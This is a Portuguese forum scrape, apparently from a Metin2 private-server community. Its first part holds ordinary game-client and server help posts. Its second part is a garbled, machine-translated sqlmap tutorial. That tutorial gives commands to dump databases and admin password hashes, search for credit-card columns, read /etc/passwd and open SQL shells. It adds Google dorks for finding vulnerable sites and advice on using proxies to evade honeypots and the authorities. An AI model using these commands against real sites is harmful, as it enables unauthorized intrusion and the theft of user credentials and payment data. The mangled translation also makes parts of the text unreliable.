Eu a pouco tempo andava ai a procura de um programa que fosse capaz de facilitar o meu trabalho em relação a imagens de metin2.
Tão procurei e encontrei o MysticThumbs323
O que é que ele faz exatamente ?
Ele tem todas as extensões de imagens ex: jpg , png, tga
e ele faz o seguinte , sem precisar de abrir a imagem ele mostra a imagem , o que me facilita muito
Assim já sei o que tem nos ficheiros e que imagens tem , facilitando-me edita-las e até mesmo substituir os ficheiros.
O resto tb terás de substituir pelos ficheiros já existentes no cliente, so não substituis se quiseres adicionar cenas novas!
Em relação dúvida 5 podes comprovar com esta imagem .
Localização : Locale - ui - loading
Comprimentos , BlackStore !
O problema que te está a causar isso vem dos msm´s
Vai ao root - procura por warrior w.msm
e verifica as linhas da armadura em questão , ver se tens tudo direito...
Contradizes-te ...
Podes por o site num alojamento web e por as funções php alojadas no teu computador e criar uma ligação....
Exemplo:
Host Free
-index.html
Seu Computador
-config.php
O que problema é simples , quando se adiciona algo na pasta pack do cliente
Temos que adicionar no INDEX do cliente, Tenho acerteza que não o fizes-te dai ele não conseguir
ir buscar as texturas etc..
Muito simples se por exemplo o arquivo !
armasnovas.eix & armasnovas.epk
Vais ao index ( Localização no pack do cliente )
E adicionas lá
*
armasnovas
*
è importante que fique como eu pus aqui, Apenas Adicionas & guardas prontos...
Qualquer dúvida , contacta-me!
Olá a todos.
Resolvi fazer um tutorial para as pessoas que têm dificuldades no seu servidor com o sistema de apagar personagens.
Primeiramente vão ao navicat e apagam a tabela player_deletedDepois vão à parte das querys e executam esta query :CREATE TABLE player_deleted SELECT * FROM player LIMIT 0;Só fazer reboot e está funcionavel a opção do apagar personagem.
Verificas-te se a conta tem códico de apagar personagem?
Verifica no navicat , Se tem faz o seguinte
Esvazia a conta toda , mete ela nivel 1 e tenta apagar a ver se dá...
Boas Pessoal.
Não sei se já existia este tutorial, mas vim aqui posta-lo.
Vou deixar tutorial descritivo e tutorial em vídeo.
-Como alterar o nome do Launcher do Rancoroso:
http://prntscr.com/54esxu
Vamos lá ao tutorial.
1º Passo:
-Baixar os 2 ficheiros que irei disponibilizar no final do tutorial.
2º Passo:
-Abrir o HxD e ir a File > Open e colocar o ficheiro Overgame
http://prntscr.com/54et47
3º Passo:
- Clicar CTRL + F e colocar igual à imagem
http://prntscr.com/54etcv
4º Passo:
-Depois dão OK e clicam com o rato aqui:
http://prntscr.com/54etsd
5º Passo:
-Escreverem o que quiserem . (Atenção! Não pode chegar à letra ô) Exemplo:
http://prntscr.com/54eu4p
6º Passo
-Fechar e Guardar
7º Passo
-Irá ser criado o seguinte ficheiro "MT2Overgame.exe.bak"
http://prntscr.com/54euc4
8º Passo
-Como vão ver, foi mudado o nome:
http://prntscr.com/54euje
9º Passo
-Ao abrirem o Launcher vai criar um decumento txt dizendo : "servidor" que é onde vão por o IP
10º Passo
-Depois copiam os 3 ficheiros e colam no cliente !
http://prntscr.com/54eupi
Tutorial em Vídeo:
-----------------------------------------
Download do MT2Overgame: http://www.4shared.com/rar/E66nNUTU/MT2Overgame
Download do HxD: http://www.baixaki.com.br/download/hex-workshop.htm
---------------------------------------------
O vídeo foi feito à algum tempo, pelo meu antigo canal [Gibellini Gi , mas o nome alterou para Francisco Torres (hà mt tempo)]
A solução ta ai mesmo , " O launcher tem que estar na pasta do cliente "
O teu antivirus eliminou o .bin
Vais ao antivirus desativas ele ou então adicionar o bin as exclusões para ele não te eliminar!
se por acaso desativares ele terás que ir a Quarentena e restaurar o ficheiro..
. 1 Comando opção - uDeixe ' s dizer , temos meta algo como :http : //www.domain.com/article.php?id=7Injeção de comandos :$ ./ sqlmap . py - u ""https://123.123.123.123:3128" -- dbs . 6 Comando opção - dbmsSuponha que nós ' re certeza de que o site de destino usa o tipo de banco de dados MySQL . Nós podemos definir isso em o comando com opções - dbms = mysql , de modo que será mais rápido no ataque de injeção , ao invés de girar através de todos os tipos de banco de dados , como A Oracle , MSSQL , etc .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- forms -- dbms = mysql -- dbs . 7 Comando opção - D , - T , - C- D : despejo de banco de dados- T : depósito de mesa- C : despejo colunaDeixe ' s dizer que temos o nome do banco de dados como : sitedb .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T Esse comando acima irá enumarate tudo tabelas nome de determinado banco de dados que é " sitedb ".Deixe ' s dizer que temos 15 mesas de nome , um deles é : administrador . E nós queremos enumerar para seu nome colunas .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C Esse comando acima irá enumarate todas as colunas nome de determinado banco de dados que é " sitedb " e mesa " administrador ".Deixe ' s dizer que temos 6 colunas nome , por exemplo : id , admin_id , admin_pass , admin_fullname , admin_mail , admin_level .Nós queremos despejar todos os dados na tabela " administrador ".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - despejo Ou se você quiser despejar apenas determinadas colunas , como " admin_id " e " admin_pass ".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , admin_pass - despejo . 8 Comando opção - respostasEsta opção é útil vry se você quer executar o processo de ataque 100 % automaticamente, sem qualquer intervenção do utilizador .Por exemplo , quando você está descarregando os dados de determinada tabela ( veja a opção de comando 6 acima ), SqlMap irá automaticamente tentar rachar qualquer cadeia que tem formato como " hash de senha ".Por exemplo :Em despejo da mesa " administrador ", você tem 3 linhas de registro , essas são :Admin : 0cc175b9c0f1b6a831c399e269772661gerente : 92eb5ffee6ae2fec3ad71c777531578fstaf : 4a8a08f09d37b73795649038408b5f33Desde que encontrou dados de campo como " 0cc175b9c0f1b6a831c399e269772661 ? que tem como formato MD5 - haxixe , SqlMap vai tentar a quebrá-la automaticamente usando lista de palavras em dir " txt ". Cracking 3 hashes com poucos lista de palavras , levaria um curto tempo . Mas o que se o hashes encontrados são cerca de 10 , 000 registros e a contagem de lista de palavras é mais do que 100 , 000 , 000 linhas ?? Wouldn ' t demorar muito tempo tempo de espera .A melhor idéia é despejar todos os dados em primeiro lugar , em seguida, o processo de craqueamento pode ser feito mais tarde separadamente . Para este propósito , podemos usar opção de comando - respostas , para fazer SqlMap pular " rachar " processo .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , administrador - passar - despejo - respostas = "rachar = N" - resposta = " rachar = N ", tomamos certa especial única seqüência de rachar a questão , que é " de crack ", e que defina -o para " N " = Não .9. Command opção - rubor - sessãoInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- flush - session Esse comando acima irá fazer SqlMap para lavar todas as sessões encontrados a partir de injeção anterior direcionados a determinado site . Isso é muito útil quando você fazer a injeção com T ( Tempo ) de ataque baseado , como às vezes há ' sa ficando para conexão com o site de destino .Mas , tenha cuidado usando - rubor - sessão , como ele irá apagar todas as sessões de injeção e arquivo para esse destino . Esta opção significa que o próximo processo de injeção começará a partir de zero , como se nós nunca injetar o alvo antes .. 10 Comando opção - hex$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - C admin_id , administrador - passar - despejo - hex - tecnologia = T Usando - opção hexadecimal é muito útil quando o processo de injeção usa T ( Tempo ) com base . Meios que os dados que estão sendo recuperados são convertidos em HEX ( hexadecimais ) dígitos antes de começar a entregar . Isso também para evitar quaisquer caracteres estranhos que estão sendo recuperados .11. Comando opção - não - elenco" cast " função no MySQL significa , para converter uma seqüência de caracteres para um personagem diferente conjunto .Por exemplo :SELECT CAST ( _latin1 'teste' AS CHAR CHARACTER SET utf8 );Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- no - cast Observe que , nós podemos ' t junção entre - não - elenco e - opção hex . Nós temos que escolher um deles em um comando .12. Comando opção - despejo - todosPara despejar todos os bancos de dados encontrados , mas exclui " information_schema " DB ou excluir DBMS banco de dados do sistema .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dump - all -- exclude - sysdbs . 13 Comando opção - contagemInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - T administrador - contagem Para contar registros / linhas em uma determinada tabela . Muito útil se você quiser verificar quantos registros / linhas em uma tabela antes de despejá-lo .. 14 Comando opção - início , - finalDeixe ' s dizer que encontramos mesa " membro " e há cerca de 24 , 000 registros em que . E nós queremos despejar início do registro " 1000 ? a " 2000 ?.Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - membro T - despejo - respostas = "rachar = N" - começar = 1000 - final = 2000 . 15 Comando opção - pesquisaDeixe ' s dizer que existem cerca de 90 tabelas em um determinado banco de dados , e queremos curta nosso tempo olhando para a tabela contém certas " nome do campo ". Por exemplo : credit_card_type .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - busca = "credit_card_type" Ele irá procurar através das tabelas inteiras na base de dados " sitedb " e encontrar em nome do campo " credit_card_type ".. 16 Comando opção - atrasoEsta opção - demora algum tempo usado com T ( Tempo ) Tipo de ataque baseado , para evitar atraso conexão de / para o alvo e para obter dados com precisão .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- batch -- dbs -- delay = 5 -- tech = T Observe , quando nós usar - atraso na Hora tipo de ataque baseado , não é nenhuma " linha " que está sendo definido . Tópico é apenas um , por padrão .- atraso = 5 , significa atraso entre um ataque ao próximo ataque é 5 segundos .17. Comando opção - comuns - mesas , - comuns - colunasSuponha que temos o nome do banco de dados " sitedb ", o tipo de banco de dados é MySQL versão 4.0 . Como sabemos que o MySQL versão 4 doesn ' t tem " information_schema " banco de dados do sistema , por isso vai ser difícil de enumerar as tabelas / colunas nome . Nós vamos utilização " fuzzing / bruteforcing " técnica para obter a tabela e nome da coluna .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - comum - tabelas Esse comando acima irá tentar a Bruteforce para o nome da tabela com base na lista de nomes de tabelas .Deixe ' s dizer que encontrei uma mesa , por exemplo : membro . Mas nós don ' t tem alguma idéia do que o nome da coluna é . Em seguida , vamos bruteforce para o nome da coluna .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch - D sitedb - comum - colunas Esse comando acima irá tentar a Bruteforce para o nome da coluna com base na lista de nomes de colunas .18. Comando opção - sql - shellPara pedir por um comando interativo shell SQL .$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- sql - shell Ele vai mostrar um comando interativo shell SQL .Por exemplo , nós queremos fazer consulta SQL da tabela " administrador ".> selecione contagem (*) do administrador ;Você também pode usar - sql - consulta diretamente a partir do comando de injeção , por exemplo :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- sql - query = "select count (*) from admin " 19. Comando opção - MSF - caminhoPara solicitar uma concha que se refere a MSF ( Metasploit ) Framework . Instale MSF primeiro antes de usar esta opção de comando .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- msf - path = "the_MSF_path_where_it_is_installed" 20. Comando opção - arquivo - leiaPara ler qualquer ( legível ) do arquivo no servidor .Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- file - read = "/etc/passwd" . 21 Comando opção - adulteraçãoPara usar adulteração para o ataque de injeção . Por exemplo , nós queremos dar o ataque de injeção com corda "+" para qualquer caractere de espaço em que . Significa que irá converter todos os espaços com seqüência de "+".Injeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- dbs -- tamper adulterar / space2plus . py Para breve o comando de ligação de sabotagem , você pode configurar link de atalho para todos os scripts de adulteração no dir " adulterar ".$ Ln - s adulteração / space2plus . py space2plus . pyFaça o mesmo para outros scripts de adulteração que você quer fazer atalho para ele .. 22 Comando de opção - usuários , - senhas , - papéis , - privilégios , - é - dba- usuários : para enumerar todos os usuários do banco de dados- senhas : para enumerar todos os paswords de banco de dados para cada um dos usuários- funções : para enumerar todas as funções de cada um dos utilizadores- privilégios : para enumerar todos os privilégios para cada um dos usuários- É - dba : para verificar se o usuário do banco de dados atual é um banco de dados Administrador ou nãoInjeção de comandos :$ ./ sqlmap . py - u "http://www.domain.com/article.php?id=7" -- random - agent -- level 2 -- risk 2 -- threads 5 -- batch -- users -- passwords -- roles -- privileges -- is - dba Útil se você deseja verificar se o usuário do banco de dados atual é um DB Administrador ou não , ou para verificar o usuário tem " escrever " privilégio ou não . Se o usuário tem " escrever " privilégio , então poderíamos tem chance de escrever arquivo no servidor . Ele ' s apenas como " mysql_into_outfile " comando .Boa sorte com a sua injecção .Nota :- Se você faz a injeção com SqlMap de VPS ( Virtual Privada Servidor ) e resultados processo do Google , ter cuidado .. às vezes você don ' t perceber que o local de destino que você ' re atacou é um " honeypot ". Ele ' sa armadilha geralmente definida por empresa de segurança ou empresa de monitoramento de internet . Uma vez que você ' re preso em servidor honeypot , ele irá gravar toda a sua injeção / hackear atividades e seu IP . Então , a autoridade empresa vai apresentar para o relatório legal para sua empresa de hospedagem , e você vai ficar de alerta de los muito em breve . Você ' tem sorte se você só ficar alerta , mas se você fazer isso muitas vezes , empresa de hospedagem pode bloquear / suspender o serviço de VPS por causa de atividades ilegais . Então , basta ter cuidado com o alvo que você ' re tentando truque , você pode usar IP proxy para cobrir o seu IP real .
creditos kira
Bem como há centenas de milhares de tutoriais sobre este assunto eu vou ser rápido e claro. Não sou especialista nisso! 1.- Identificar site vulnerável.Vamos apresentar o último valor da URL " Encontramos algo parecido com isto. Neste caso, o "idiota" seria
inurl : "products.php cat =?"
inurl : "cat ="
Você pode jogar com esses valores. 2.- componentes necessários para usar SqlMap site oficial SqlMap
http : //sqlmap.org/
Site oficial Python - Eu uso a versão 2.7.5
http : //www.python.org/
Instruções
a) Instale o Python
b) Extrair e copiar o conteúdo da página SqlMap pacote de download, renomeie a pasta com um nome como "SqlMap" mais fácil porque quando descompactar o nome da pasta é longa em C:
c) Agora, com o console de comando do Windows (CMD) estamos localizados na pasta sqlm localizado em C: 3.- Agora vamos explorar a vulnerabilidade que temos encontrado.
- u URL , - url = URL de destino URL ( e . g . "www.target.com/vuln.php?id=1" )
- tópicos = LINHAS Max número de HTTP concorrente ( s ) pedidos ( default 1 )
- dbs enumerar bancos de dados DBMS
- mesas Enumerar DBMS tabelas de banco de dados
- banco de dados D DB DBMS para enumerar
- colunas Enumerar DBMS colunas da tabela do banco de dados
- banco de dados tabela T TBL DBMS para enumerar
- banco de dados D DB DBMS para enumerar
- banco de dados tabela T TBL DBMS para enumerar
- banco de dados D DB DBMS para enumerar
- C COL DBMS coluna da tabela do banco de dados para enumerar
26 membros com e-mail e senha, algumas páginas da web salva a senha em texto simples, outra criptografada com MD5 SHA1 algoritmos etc.Finalmente é criada uma pasta onde você pode acessar as informações que extrair c: SqlMap output nome do site despejar SqlMap completa ajudar
Como eu sabia que todos os aspectos da injeção Tenho rápido e direto, às vezes não é tão fácil, mas não impossível. Você também pode usar ferramentas como Acunetix a varredura de um site à procura de uma vulnerabilidade que pode ser explorada, ou você pode usar dorks de pesquisa através de google ou com ferramentas como o "Exploit Scanner SQLI" Este tutorial também está disponível em espanhol Dúvidas, sugestões e correções por favor, comente